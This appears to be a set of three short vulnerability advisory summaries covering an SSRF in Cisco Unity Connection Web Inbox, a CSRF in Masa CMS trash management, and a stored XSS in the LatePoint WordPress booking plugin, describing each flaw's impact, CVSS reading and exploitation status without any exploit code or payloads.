Server-Side Request Forgery (SSRF) in Cisco Unity Connection Web Inbox allows remote unauthenticated attackers to send arbitrary network requests sourced from the vulnerable server. The vulnerability affects the web UI component and requires no authentication, privileges, or user interaction (CVSS AV:N/AC:L/PR:N/UI:N), enabling attackers to abuse the server's network position for internal network reconnaissance, service enumeration, or attacks against backend systems. The changed scope (S:C) indicates impact extends beyond the vulnerable component to other network resources accessible from the Unity Connection server.
Cross-Site Request Forgery in Masa CMS trash management allows remote attackers to permanently delete all trashed content through a logged-in administrator. An attacker tricks an authenticated admin into visiting a malicious page that submits a forged trash-emptying request, bypassing CSRF protections and causing irreversible data loss across all pending-deletion content. The vulnerability affects default administrative interfaces without requiring special configuration. No active exploitation confirmed at time of analysis, though the attack technique is well-documented for CSRF vulnerabilities. EPSS data not available.
Stored Cross-Site Scripting in LatePoint Calendar Booking Plugin for WordPress allows unauthenticated remote attackers to inject malicious JavaScript via the 'first_name' parameter in appointment booking forms, affecting all versions through 5.5.0. The injected scripts persist in the database and execute whenever administrators or other users view booking records, potentially enabling session hijacking, privilege escalation, or further attacks against site administrators. The CVSS vector indicates network-accessible exploitation with no authentication required and changed scope, enabling attacks beyond the vulnerable component. EPSS score not provided; no confirmation of active exploitation (not in CISA KEV) or public exploit code at time of analysis.